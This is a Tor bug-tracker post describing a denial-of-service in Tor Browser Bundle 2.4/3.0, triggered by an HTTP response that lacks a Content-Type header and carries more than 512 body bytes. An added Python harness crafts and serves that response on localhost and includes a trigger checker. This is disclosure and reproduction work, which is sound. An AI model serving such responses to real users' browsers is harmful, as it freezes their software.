[tor-bugs] #9901 [Tor bundles/installation]: DoS of TBB 2.4/3.0 when no Content-Type header and more than 512 bytes of content are sent

Tor Bug Tracker & Wiki blackhole at torproject.org
Sat Oct 5 07:53:29 UTC 2013


#9901: DoS of TBB 2.4/3.0 when no Content-Type header and more than 512 bytes of
content are sent
--------------------------------------+-----------------------
 Reporter:  sqrt2                     |          Owner:  erinn
     Type:  defect                    |         Status:  new
 Priority:  normal                    |      Milestone:
Component:  Tor bundles/installation  |        Version:
 Keywords:  tbb dos content-type      |  Actual Points:
Parent ID:                            |         Points:
--------------------------------------+-----------------------
 Following a user question in #tor where the user couldn't open the URL
 <http://cdimage.debian.org/debian-cd/7.1.0/i386/iso-dvd/MD5SUMS> in TBB, I
 decided to investigate the problem by simulating a webserver with netcat.
 (The file loads fine in non-TBB Firefox; the problem exists in both TBB
 beta and alpha, presumably also in stable.) Here are my findings:

  * The above resource is delivered without a Content-Type header by
 cdimage.debian.org.

  * Upon retrieving the resource, Firefox displays a blank page and starts
 consuming 100% CPU (only one core on SMP systems) periodically, backing
 down for a few seconds every now and then.

  * When adding a Content-Type header to the server response, Firefox shows
 the file in the browser (text/plain) or displays the content type warning
 dialog (other content type), as expected.

  * One can remove all headers (not, of course, including "HTTP/1.0 200 OK")
 and the problem will still occur.

  * The problem stops occurring once 512 bytes or fewer of content (without
 headers and \n\n) are sent. The content will then be displayed as a text
 file in Firefox.

  * There is no significant change on the wire between the two cases -- the
 reply consists of two TCP packets broken up at the same point.

 In a nutshell, service can be denied by crafting a special server response
 to an ordinary HTTP request. However, because Firefox only consumes 1 core
 and occasionally backs down briefly, the user will likely be able to
 recover from the situation by closing the problematic tab.

-- 
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/9901>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online
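The netcat setup the reporter describes, rewritten as a small Python reproduction harness. This is an added example, not code from the ticket or from the Tor Project: it builds the raw response the bullets above describe (status line "HTTP/1.0 200 OK", no Content-Length, Content-Type present or absent, a chosen number of body bytes, then close of connection), serves it once on a localhost port so a browser or proxy can be pointed at it, and includes a checker for the two reported trigger conditions (no Content-Type header and more than 512 body bytes). The body filler, the file name "/MD5SUMS" in the request, the 513-byte default and the line-ending parameter are assumptions made for the example; the reporter's netcat test used bare "\n\n" as the header/body separator, which is why `eol` can be switched to "\n".

```python
import http.client
import socket
import threading

DEFAULT_BODY_LEN = 513  # assumed default: one byte over the threshold reported in the ticket


def build_response(body_len=DEFAULT_BODY_LEN, content_type=None, eol="\r\n"):
    """Build the raw bytes a netcat-style server would send.

    No Content-Length is emitted, so the body is delimited by connection close
    (HTTP/1.0 semantics).  Content-Type is emitted only when asked for; the
    ticket's DoS case is content_type=None.  eol="\n" reproduces the bare-LF
    separator the reporter used with netcat.
    """
    headers = ["HTTP/1.0 200 OK"]
    if content_type is not None:
        headers.append("Content-Type: " + content_type)
    head = eol.join(headers) + eol + eol
    # Constructed filler: printable text so a sniffer would classify it as text.
    filler = "0123456789abcdef\n"
    body = (filler * (body_len // len(filler) + 1))[:body_len]
    return head.encode("ascii") + body.encode("ascii")


def matches_ticket_trigger(raw):
    """True when a raw response has both reported properties: no Content-Type
    header and more than 512 bytes of body after the header/body separator.
    Accepts either CRLF or bare-LF separators, as Firefox does."""
    for sep in (b"\r\n\r\n", b"\n\n"):
        idx = raw.find(sep)
        if idx != -1:
            head, body = raw[:idx], raw[idx + len(sep):]
            break
    else:
        return False  # no separator at all: not a complete response
    has_ct = any(line.split(b":", 1)[0].strip().lower() == b"content-type"
                 for line in head.splitlines()[1:])
    return not has_ct and len(body) > 512


def serve_once(response, host="127.0.0.1", port=0):
    """Listen on an ephemeral port and answer exactly one request with `response`.
    Returns (bound_port, thread); the thread closes the socket when done."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]

    def handler():
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(5)
            # Drain the request head; the reply is the same whatever was asked.
            buf = b""
            while b"\r\n\r\n" not in buf and b"\n\n" not in buf:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                buf += chunk
            conn.sendall(response)
            conn.shutdown(socket.SHUT_WR)  # EOF is what terminates the body
        srv.close()

    t = threading.Thread(target=handler, daemon=True)
    t.start()
    return bound_port, t


def probe(body_len=DEFAULT_BODY_LEN, content_type=None):
    """Serve one crafted response over localhost and fetch it with http.client.
    Returns (status, headers, body) as a non-browser client sees them."""
    port, t = serve_once(build_response(body_len, content_type))
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/MD5SUMS")  # path is an assumption for the example
    resp = conn.getresponse()
    body = resp.read()  # reads to EOF because there is no Content-Length
    headers = {k.lower(): v for k, v in resp.getheaders()}
    conn.close()
    t.join(5)
    return resp.status, headers, body


if __name__ == "__main__":
    for n, ct in [(512, None), (513, None), (513, "text/plain")]:
        status, hdrs, body = probe(n, ct)
        print(f"body={n} content_type={ct!r}: status {status}, "
              f"{len(body)} bytes received, Content-Type={hdrs.get('content-type')!r}, "
              f"trigger={matches_ticket_trigger(build_response(n, ct))}")
```

To reproduce the report against a browser rather than `http.client`, call `serve_once(build_response())` from an interactive session, note the printed port, and open `http://127.0.0.1:<port>/` in the bundle under test; the 512-byte and text/plain variants give the control cases the reporter describes. `matches_ticket_trigger` is the kind of check a filtering proxy could run on responses before handing them to the browser.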